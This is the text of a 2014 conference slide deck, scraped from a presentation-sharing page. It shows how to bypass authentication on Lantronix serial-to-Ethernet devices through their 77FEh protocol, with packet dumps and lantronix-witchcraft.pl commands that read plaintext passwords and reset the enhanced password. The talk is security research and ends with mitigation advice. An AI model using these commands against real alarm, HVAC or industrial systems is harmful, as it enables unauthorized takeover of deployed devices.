Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 

Último (20)

Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 

Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

  • 1. 1 Mos Eisley Lab Confidence 2014 Exploring treasures of 77FEh Getting access to Lantronix devices Vlatko Kosturjak, Diverto @k0st
  • 2. 2 Mos Eisley Lab Who are you!?!!?? ● Security Jedi at Diverto – Bringing balance to the force ● Experience – Offensive (Penetration tester) – Defensive (Developer/System Administrator/...) – Have code in: Nmap, Metasploit, OpenVAS, … – Author of free software: https://github.com/kost/ ● If you trust in certificates – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
  • 3. 3 Mos Eisley Lab Agenda ● Introduction - Lantronix ● Physical access ● WTF is 77FEh? ● Vulnerabilities & Exploitation ● Recommendations ● Questions and answers 45 minutes
  • 5. 5 Mos Eisley Lab You can find them as integral part of ● Alarms ● HVACs ● Pool monitoring systems ● Sprinkler controllers ● Hacked vacuum cleaners - Roombas ● Embedded systems ● Industrial systems Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
  • 6. 6 Mos Eisley Lab What they are running actually? ● OS – CoBos (mostly) – Evolution OS/Linux – ThreadX – Linux ● Support – 1 or more serial ports – Modbus (few models) – 10/100 Ethernet
  • 7. 7 Mos Eisley Lab Physical access ● Like usual – Game over ● Serial access – No password by design ● Requirements – Standard TTL cable – BusPirate – ...
  • 8. 8 Mos Eisley Lab Connecting to serial port... ● 9600 bps 8/N/1 ● Flow control: None
  • 9. 9 Mos Eisley Lab Most frequent services Available – TCP/IP ● Web (tcp/80) ● Telnet (tcp/9999) ● 77FEh (tcp-udp/30718) ● SNMP (udp/161) Telnet administration interface What is this? Mostly information disclosures Simple web server Serving applet JAR which talks to 30718 port
  • 10. 10 Mos Eisley Lab Device Discovery ● Ask :) ● Look if you have physical access ● Passive ● Active/Scanning – Standard port scanning is fine with conservative timing – Broadcast UDP to specific Lantronix ports (30718) ● Beware – Version scanning(-sV) or running vulnerability scanners may misconfigure device –
  • 11. 11 Mos Eisley Lab Telnet administration $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Password :
  • 12. 12 Mos Eisley Lab So, WTF is 77FEh finally? ● 0x77FE = 30718 (10) ● TCP/UDP protocol for device setup – Proprietary protocol – Used by DeviceInstaller (proprietary software from Lantronix) ● Designed for – Setup of device – Administration of device – Getting device info – Insecurity (sorry, had to write it, you'll see later ;) )
  • 13. 13 Mos Eisley Lab Sample 77FEh communication [v] Sending 4 bytes: 0x00000000 (00000) 000000f6 .... [v] Received 30 bytes: (00000) 000000f7 00108005 58324400 df0e0000 ........X2D..... (00016) 62a7d944 00000000 00204a91 84fb b..D..... J... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip> Query setup request (4) Query setup response (4) MAC address of the device (6) Device type
  • 14. 14 Mos Eisley Lab Interesting request – #1 ● [v] Sending 4 bytes: ● 0x00000000 (00000) 000000f8 .... ● ● [v] Received 124 bytes: ● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST ● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L........... ● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................ ● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ ● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ ● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ ● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ ● 0x00000070 (00112) 00000000 00000000 00000000 ............ Query setup (4) Simple Password In Plaintext (4) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip> IPv4 (4)
  • 15. 15 Mos Eisley Lab Previous – work ● Metasploit – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● Tools – Simple C program by jgor ● https://github.com/jgor/lantronix-telnet-pw
  • 16. 16 Mos Eisley Lab But... ● Simple password is not set ● Device still asks for password ● Further digging – Enhanced password in place – You cannot get/reset the enhanced password easily – Length is bigger (4->16) – Challenge!!!
  • 17. 17 Mos Eisley Lab Introduction to enhanced passwords Source: Lantronix documentation Feature/Type Simple Password Enhanced Password Length 4 16 Visible in query setup yes no
  • 19. 19 Mos Eisley Lab Interesting request - #2 [v] Sending 4 bytes: 0x00000000 (00000) 000000f4 .... [v] Received 32 bytes: 0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST 0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3......... 0x00000020 (00032) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip> Simple Password In Plaintext (4) Query ext version Request (4) Version (6)
  • 20. 20 Mos Eisley Lab Interesting request #3 ● Request to query configuration – 000000eX ● Response to query configuration – 000000bX + followed by 126 bytes of setup – ● X=number of setup records (0 – F): – 0 basic setup record ● Simple password, IP... – 1 security record ● Enhanced password, AES key, SNMP... – 2 specific products / situations – 3 OEMs – ... Wrong! Request for security record 1 provides just zero bytes! HALF
  • 21. 21 Mos Eisley Lab Interesting request #4 ● Request to change configuration – 000000cX + followed by 126 bytes of setup ● Response to change configuration – 000000bX – ● X=number of setup records (0 – F): – 0 basic setup record – 1 security record – 2 specific products / situations – 3 OEMs
  • 22. 22 Mos Eisley Lab Setting setup record 1 for security [v] Sending 130 bytes: 0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................ 0x00000010 (00016) 00000000 00000000 00000000 00000000 ................ 0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public.... 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ 0x00000070 (00112) 00000000 00000000 00000000 00000000 ................ 0x00000080 (00128) 0000 .. [v] Received 4 bytes: 0x00000000 (00000) 000000b1 .... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip> Setting Setup record 1 Was successful Set Setup record 1 (security) request SNMP Community String (13) Enhanced Password (16)
  • 23. 23 Mos Eisley Lab Enhanced password gone no password to enter! $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Press Enter for Setup Mode
  • 24. 24 Mos Eisley Lab Authentication Algorithm Guess Authenticate Enhanced Password Simple Password Enhanced Not set Ask for enhanced Ask for simple Display setup menu Enhanced set Simple set Simple Not set Password OK
  • 25. 25 Mos Eisley Lab New tool: lantronix-witchcraft ● 77FEh protocol implementation ● 77FEh security related utility ● All the tricks mentioned implemented ● Free software: GPL2 ● Requirement: Perl ● Available at – https://github.com/kost/lantronix-witchcraft
  • 26. 26 Mos Eisley Lab Basic usage: ● Display Mac address: – ./lantronix-witchcraft.pl -Q <ip> ● Display Simple Password (up to 4 characters) – ./lantronix-witchcraft.pl -P <ip> ● Reset Security record (together with enhanced password) – ./lantronix-witchcraft.pl -E <ip> ● Reset Security record without AES (with enhanced password) – ./lantronix-witchcraft.pl -S <ip> ● Dump setup records – ./lantronix-witchcraft.pl -G -D <ip>
  • 27. 27 Mos Eisley Lab Brave enough? ● One command to rule them all ● Display Mac address and simple password, dump setup records, reset security records together with enhanced password: – – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip> ●
  • 28. 28 Mos Eisley Lab Still wondering why automatic scanning is bad for Lantronix? ● ● Dump of setup record: 00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y| 00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0| 00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{| 00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0| 00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
  • 29. 29 Mos Eisley Lab Correct way ● Ask – Someone responsible if they could have something like that ● Send broadcast query packet to 77FEh ● Identify ports 30718 open (TCP or UDP) ● Dump setup records ● Play ;) ● Check if it is still working... – If yes, perfect – If not: huh, but you should restore setup records somehow ;)
  • 30. 30 Mos Eisley Lab It's not about Lantronix... ● ...they warned the vendors about it in their documentation Source: Lantronix documentation
  • 31. 31 Mos Eisley Lab Disclosure Problem ● It's more about vendors who implement Lantronix in their devices ● Whom to report? – Lantronix – I guess they know their protocol ;) – OEMs – hard to find all their customers ;) ● Awareness – Conference – Tools
  • 32. 32 Mos Eisley Lab But maybe it could be done... ● Add white list ● Encryption/SSL? Source: Lantronix documentation
  • 33. 33 Mos Eisley Lab Recommendations ● Have some other device to VPN/SSL tunnel the services ● Telnet only through VPN or other secure channel to administration interface ● Disable 77FEh if not needed ● Filter out 77FEh on network devices to only allowed ones ● Disable other unneccesary services (SNMP, telnet, etc).
  • 35. 35 Mos Eisley Lab Summary ● There are ways to pass beyond authentication (if 77FEh is enabled) – Simple passwords – Enhanced passwords ● Tools – Metasploit Lantronix modules – https://github.com/kost/lantronix-witchcraft ● Recommendations – Disable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones – Tunnel VPN/SSL all communication to these devices ● Future – There are things to research: way to obtain enhanced password or AES keys for example
  • 36. 36 Mos Eisley Lab Acknowledgements - Thanks ● Previous work (Simple Passwords) – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● https://github.com/jgor/lantronix-telnet-pw ● Colleagues – Dalibor Dosegović, hardware wizard